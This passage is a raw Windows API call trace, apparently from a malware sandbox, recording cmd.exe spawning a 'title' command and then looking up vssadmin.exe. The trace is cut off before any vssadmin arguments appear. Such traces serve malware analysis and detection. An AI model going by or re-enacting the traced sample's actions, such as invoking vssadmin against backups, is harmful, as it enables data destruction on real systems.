_String2="title") returned -2 [0046.204] GetProcessHeap () returned 0x1c0000 [0046.204] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0xb0) returned 0x1d9950 [0046.204] GetProcessHeap () returned 0x1c0000 [0046.204] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x1c) returned 0x1d4670 [0046.205] GetProcessHeap () returned 0x1c0000 [0046.205] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x22) returned 0x1d46a0 [0046.205] GetProcessHeap () returned 0x1c0000 [0046.205] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0xb0) returned 0x1d9a10 [0046.206] _wcsicmp (_String1="FOR", _String2="vssadmin.exe") returned -16 [0046.206] _wcsicmp (_String1="FOR/?", _String2="vssadmin.exe") returned -16 [0046.206] _wcsicmp (_String1="IF", _String2="vssadmin.exe") returned -13 [0046.206] _wcsicmp (_String1="IF/?", _String2="vssadmin.exe") returned -13 [0046.206] _wcsicmp (_String1="REM", _String2="vssadmin.exe") returned -4 [0046.206] _wcsicmp (_String1="REM/?", _String2="vssadmin.exe") returned -4 [0046.206] GetProcessHeap () returned 0x1c0000 [0046.206] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0xb0) returned 0x1d9ad0 [0046.206] GetProcessHeap () returned 0x1c0000 [0046.206] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x2a) returned 0x1d65b0 [0046.207] GetProcessHeap () returned 0x1c0000 [0046.207] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x48) returned 0x1d9b90 [0046.207] GetProcessHeap () returned 0x1c0000 [0046.207] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x48) returned 0x1dad40 [0046.207] _pipe (in: _PtHandles=0x1dad50, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x1dad50) returned 0 [0046.208] _dup (_FileHandle=1) returned 5 [0046.208] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0046.208] _close (_FileHandle=4) returned 0 [0046.208] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0046.208] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0046.209] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0046.209] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0046.209] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0046.209] _wcsicmp (_String1="title", _String2="CD") returned 17 [0046.209] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0046.209] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0046.209] _wcsicmp (_String1="title", _String2="REN") returned 2 [0046.209] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0046.209] _wcsicmp (_String1="title", _String2="SET") returned 1 [0046.209] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0046.209] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0046.209] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0046.209] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0046.209] _wcsicmp (_String1="title", _String2="MD") returned 7 [0046.209] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0046.209] _wcsicmp (_String1="title", _String2="RD") returned 2 [0046.209] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0046.209] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0046.209] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0046.209] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0046.209] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0046.209] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0046.209] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0046.209] _wcsicmp (_String1="title", _String2="VER") returned -2 [0046.209] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0046.209] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0046.209] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0046.209] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0046.209] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0046.209] GetProcessHeap () returned 0x1c0000 [0046.209] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x4010) returned 0x1dce00 [0046.209] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0046.209] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0046.209] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0046.209] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0046.209] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0046.209] _wcsicmp (_String1="title", _String2="CD") returned 17 [0046.209] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0046.209] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0046.209] _wcsicmp (_String1="title", _String2="REN") returned 2 [0046.209] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0046.210] _wcsicmp (_String1="title", _String2="SET") returned 1 [0046.210] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0046.210] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0046.210] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0046.210] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0046.210] _wcsicmp (_String1="title", _String2="MD") returned 7 [0046.210] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0046.210] _wcsicmp (_String1="title", _String2="RD") returned 2 [0046.210] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0046.210] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0046.210] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0046.210] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0046.210] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0046.210] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0046.210] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0046.210] _wcsicmp (_String1="title", _String2="VER") returned -2 [0046.210] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0046.210] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0046.210] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0046.210] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0046.210] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0046.210] GetProcessHeap () returned 0x1c0000 [0046.210] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0xb0) returned 0x1d9be0 [0046.210] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.210] GetProcessHeap () returned 0x1c0000 [0046.210] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x28) returned 0x1d46d0 [0046.210] GetProcessHeap () returned 0x1c0000 [0046.210] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x218) returned 0x1d9ca0 [0046.210] GetProcessHeap () returned 0x1c0000 [0046.210] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x7c) returned 0x1d9ec0 [0046.210] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0046.210] GetProcessHeap () returned 0x1c0000 [0046.210] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x420) returned 0x1dbd10 [0046.211] SetErrorMode (uMode=0x0) returned 0x0 [0046.211] SetErrorMode (uMode=0x1) returned 0x0 [0046.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x208, lpBuffer=0x1dbd20, lpFilePart=0x1af780 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1af780*="system32") returned 0x13 [0046.211] SetErrorMode (uMode=0x0) returned 0x1 [0046.211] GetProcessHeap () returned 0x1c0000 [0046.211] RtlReAllocateHeap (Heap=0x1c0000, Flags=0x0, Ptr=0x1dbd10, Size=0x48) returned 0x1dbd10 [0046.211] GetProcessHeap () returned 0x1c0000 [0046.211] RtlSizeHeap (HeapHandle=0x1c0000, Flags=0x0, MemoryPointer=0x1dbd10) returned 0x48 [0046.211] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\system32\\.") returned 1 [0046.211] GetProcessHeap () returned 0x1c0000 [0046.211] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x3e) returned 0x1dad90 [0046.211] GetProcessHeap () returned 0x1c0000 [0046.211] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x68) returned 0x1d9f50 [0046.211] GetProcessHeap () returned 0x1c0000 [0046.211] RtlReAllocateHeap (Heap=0x1c0000, Flags=0x0, Ptr=0x1d9f50, Size=0x3e) returned 0x1d9f50 [0046.211] GetProcessHeap () returned 0x1c0000 [0046.211] RtlSizeHeap (HeapHandle=0x1c0000, Flags=0x0, MemoryPointer=0x1d9f50) returned 0x3e [0046.211] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0046.211] GetProcessHeap () returned 0x1c0000 [0046.211] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0xe8) returned 0x1dbd70 [0046.214] GetProcessHeap () returned 0x1c0000 [0046.214] RtlReAllocateHeap (Heap=0x1c0000, Flags=0x0, Ptr=0x1dbd70, Size=0x7e) returned 0x1dbd70 [0046.214] GetProcessHeap () returned 0x1c0000 [0046.214] RtlSizeHeap (HeapHandle=0x1c0000, Flags=0x0, MemoryPointer=0x1dbd70) returned 0x7e [0046.298] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.298] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0x1af4f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af4f0) returned 0x1d9fa0 [0046.298] GetProcessHeap () returned 0x1c0000 [0046.298] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x0, Size=0x28) returned 0x1d4700 [0046.298] FindClose (in: hFindFile=0x1d9fa0 | out: hFindFile=0x1d9fa0) returned 1 [0046.298] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0046.298] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0046.298] GetConsoleTitleW (in: lpConsoleTitle=0x1afa40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.299] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af7f8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af7b8 | out: lpAttributeList=0x1af7f8, lpSize=0x1af7b8) returned 1 [0046.299] UpdateProcThreadAttribute (in: lpAttributeList=0x1af7f8, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af7a8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af7f8, lpPreviousValue=0x0) returned 1 [0046.299] GetStartupInfoW (in: lpStartupInfo=0x1af910 | out: lpStartupInfo=0x1af910*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0046.299] GetProcessHeap () returned 0x1c0000 [0046.299] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x20) returned 0x1d4730 [0046.299] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0046.299] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0046.299] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0046.299] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0046.299] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0046.299] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0046.299] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0046.299] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0046.299] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0046.299] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0046.299] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0046.299] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0046.299] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0046.299] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0046.299] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0046.299] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0046.299] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0046.299] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.299] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.299] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.299] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0046.299] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.299] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.299] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.300] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0046.300] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0046.300] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0046.300] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0046.300] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0046.300] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0046.300] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0046.300] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0046.300] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0046.300] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0046.300] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0046.300] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0046.300] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0046.300] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0046.300] GetProcessHeap () returned 0x1c0000 [0046.300] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1d4730 | out: hHeap=0x1c0000) returned 1 [0046.300] GetProcessHeap () returned 0x1c0000 [0046.300] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x12) returned 0x1d89e0 [0046.300] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0046.301] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 3382479\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1af830*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 3382479\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af7e0 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 3382479\"", lpProcessInformation=0x1af7e0*(hProcess=0x60, hThread=0x58, dwProcessId=0x54c, dwThreadId=0xc0)) returned 1 [0046.306] CloseHandle (hObject=0x58) returned 1 [0046.307] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0046.307] GetProcessHeap () returned 0x1c0000 [0046.307] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1dc310 | out: hHeap=0x1c0000) returned 1 [0046.307] GetEnvironmentStringsW () returned 0x1dc1c0* [0046.307] GetProcessHeap () returned 0x1c0000 [0046.307] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0xae8) returned 0x1e0e20 [0046.307] FreeEnvironmentStringsW (penv=0x1dc1c0) returned 1 [0046.307] GetProcessHeap () returned 0x1c0000 [0046.307] HeapFree (in: hHeap=0x1c0000, dwFlags=0x0, lpMem=0x1d89e0 | out: hHeap=0x1c0000) returned 1 [0046.307] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af7f8 | out: lpAttributeList=0x1af7f8) [0046.307] _get_osfhandle (_FileHandle=3) returned 0x54 [0046.307] DuplicateHandle (in: hSourceProcessHandle=0x60, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0046.307] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0046.307] _close (_FileHandle=5) returned 0 [0046.308] _dup (_FileHandle=0) returned 4 [0046.308] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0046.308] _close (_FileHandle=3) returned 0 [0046.309] GetFileAttributesW (lpFileName="vssadmin.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vssadmin.exe")) returned 0xffffffff [0046.309] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0046.309] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0046.309] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0046.309] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0046.309] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0046.309] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0046.309] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0046.309] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0046.309] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0046.309] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0046.309] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0046.309] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0046.309] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0046.309] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0046.309] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0046.309] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0046.309] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0046.309] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0046.309] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0046.309] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0046.309] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0046.309] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0046.309] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0046.309] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0046.309] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0046.309] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0046.309] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0046.309] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0046.309] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0046.309] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0046.309] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0046.309] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0046.310] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0046.310] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0046.310] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0046.310] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0046.310] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0046.310] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0046.310] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0046.310] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0046.310] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0046.310] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0046.310] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0046.310] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0046.310] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0046.310] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0046.310] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0046.310] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0046.310] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0046.310] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0046.310] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0046.310] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0046.310] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0046.310] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0046.310] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0046.310] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0046.310] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0046.310] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0046.310] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0046.310] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0046.310] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0046.310] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0046.310] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0046.310] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0046.310] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0046.310] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0046.310] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0046.310] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0046.310] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0046.310] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0046.310] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0046.311] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0046.311] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0046.311] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0046.311] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0046.311] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0046.311] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0046.311] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0046.311] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0046.311] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0046.311] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0046.311] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0046.311] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0046.311] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0046.311] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0046.311] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0046.311] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0046.311] GetProcessHeap () returned 0x1c0000 [0046.311] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x4010) returned 0x1e1910 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="DIR") returned 18 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="ERASE") returned 17 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="DEL") returned 18 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="TYPE") returned 2 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="COPY") returned 19 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="CD") returned 19 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="CHDIR") returned 19 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="RENAME") returned 4 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="REN") returned 4 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="ECHO") returned 17 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="SET") returned 3 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="PAUSE") returned 6 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="DATE") returned 18 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="TIME") returned 2 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="PROMPT") returned 6 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="MD") returned 9 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="MKDIR") returned 9 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="RD") returned 4 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="RMDIR") returned 4 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="PATH") returned 6 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="GOTO") returned 15 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="SHIFT") returned 3 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="CLS") returned 19 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="CALL") returned 19 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="VERIFY") returned 14 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="VER") returned 14 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="VOL") returned 4 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="EXIT") returned 17 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="SETLOCAL") returned 3 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="ENDLOCAL") returned 17 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="TITLE") returned 2 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="START") returned 3 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="DPATH") returned 18 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="KEYS") returned 11 [0046.312] _wcsicmp (_String1="vssadmin.exe", _String2="MOVE") returned 9 [0046.313] _wcsicmp (_String1="vssadmin.exe", _String2="PUSHD") returned 6 [0046.313] _wcsicmp (_String1="vssadmin.exe", _String2="POPD") returned 6 [0046.313] _wcsicmp (_String1="vssadmin.exe", _String2="ASSOC") returned 21 [0046.313] _wcsicmp (_String1="vssadmin.exe", _String2="FTYPE") returned 16 [0046.313] _wcsicmp (_String1="vssadmin.exe", _String2="BREAK") returned 20 [0046.313] _wcsicmp (_String1="vssadmin.exe", _String2="COLOR") returned 19 [0046.313] _wcsicmp (_String1="vssadmin.exe", _String2="MKLINK") returned 9 [0046.313] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0046.313] GetProcessHeap () returned 0x1c0000 [0046.313] RtlAllocateHeap (HeapHandle=0x1c0000, Flags=0x8, Size=0x420) returned 0x1c1320 [0046.313] SetErrorMode (uMode=0x0) returned 0x0 [0046.313] SetErrorMode (uMode=0x1) returned 0x0 [0046.313] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1c1330, lpFilePart=0x1af9f0 | out: 